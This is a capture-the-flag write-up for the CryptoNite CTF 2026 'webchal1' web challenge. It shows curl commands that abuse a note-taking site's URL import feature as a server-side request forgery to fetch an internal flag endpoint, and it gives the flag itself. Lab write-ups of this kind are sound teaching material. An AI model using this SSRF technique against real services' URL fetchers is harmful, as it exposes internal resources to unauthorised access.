244 words
1 minute
CryptoNite CTF 2026 - webchal1 - Web Exploitation Writeup
2026-03-10
Writeup
CTF
/
Security
/
Web Exploitation

Category: Web Exploitation Flag: TACHYON{5SrF_inj3ct10N_c0ol_123wed3}

Challenge Description#

Checkout this cool note-taking website we made

Everything about the challenge is in the website itself. https://webchal1.vercel.app/

Analysis#

The app was a note-taking site with an import feature, so the first thing I checked was the challenge page hint to see what was actually protected. It explicitly pointed at an internal flag endpoint and confirmed the expected flag format, which immediately suggested SSRF through the import flow.

Terminal window
curl -s "https://webchal1.vercel.app/challenge" | rg -o "(/api/internal/flag|TACHYON\{\.\.\.\}|internal endpoint)"
/api/internal/flag
TACHYON{...}
/api/internal/flag
TACHYON{...}

At that point, I verified how the frontend actually submits imports by checking the client chunk used by /import. Seeing /api/notes/import in the bundle gave the exact backend route to hit directly.

Terminal window
curl -s "https://webchal1.vercel.app/_next/static/chunks/97ef6067a1b24432.js" | rg -o "/api/notes/import"
/api/notes/import

From there, the solve was clean: send the importer a URL pointing to the internal flag API on the same host, keep the same session cookie, and read back notes to extract the flag pattern. It worked right away, which felt very satisfying.

smile

Terminal window
curl -s -c "/tmp/webchal1.cookies" -X POST "https://webchal1.vercel.app/api/notes/import" -H "Content-Type: application/json" -d '{"url":"https://webchal1.vercel.app/api/internal/flag"}' && echo && curl -s -b "/tmp/webchal1.cookies" "https://webchal1.vercel.app/api/notes" | rg -o "TACHYON\{[^}]+\}"
{"id":3}
TACHYON{5SrF_inj3ct10N_c0ol_123wed3}
TACHYON{5SrF_inj3ct10N_c0ol_123wed3}

The core bug is server-side URL fetching without internal-resource protection. The importer can be used as an SSRF primitive to access /api/internal/flag, and the fetched response is stored as a note that can be read back.

Solution#

Terminal window
curl -s -c "/tmp/webchal1.cookies" -X POST "https://webchal1.vercel.app/api/notes/import" -H "Content-Type: application/json" -d '{"url":"https://webchal1.vercel.app/api/internal/flag"}' && echo && curl -s -b "/tmp/webchal1.cookies" "https://webchal1.vercel.app/api/notes" | rg -o "TACHYON\{[^}]+\}"
{"id":3}
TACHYON{5SrF_inj3ct10N_c0ol_123wed3}
TACHYON{5SrF_inj3ct10N_c0ol_123wed3}
CryptoNite CTF 2026 - webchal1 - Web Exploitation Writeup
https://fuwari.vercel.app/posts/77/cryptonite-ctf-2026-webchal1-web-exploitation-writeup/
Author
Light
Published at
2026-03-10
License
CC BY-NC-SA 4.0
CryptoNite CTF 2026 - The Onion - Miscellaneous Writeup
CodeVinci CTF 2026 - Are u AI addicted ? - Cryptography Writeup
© 2026 Light. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari